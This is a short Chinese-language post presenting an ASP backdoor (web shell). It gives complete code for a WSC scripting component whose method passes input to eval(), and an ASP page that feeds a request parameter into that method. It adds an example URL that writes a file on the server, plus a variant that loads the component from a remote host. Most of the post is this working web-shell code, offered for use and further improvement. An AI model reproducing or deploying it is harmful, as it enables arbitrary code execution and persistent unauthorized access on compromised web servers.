利用wsc制作的一个asp后门

时间:2022-03-14 14:21:24
  1. <?xml version="1.0" encoding="gb2312" standalone="yes"?> 
  2. <?component error="true" debug="true"?> 
  3. <package
  4. <component id="haiyangtop"
  5. <public
  6. <method name="lcx"><parameter name="b"/></method> 
  7. </public
  8. <script language="VBScript"><![CDATA[ 
  9. sub lcx(b) 
  10. eval(b) 
  11. end sub 
  12. ]]> 
  13. </script> 
  14. </component> 
  15. </package


backdoor.asp内容如下:

  1. <% 
  2. b=request("a"
  3. Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop"
  4. fs.lcx(b) 
  5. %> 


调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。
如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。
算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。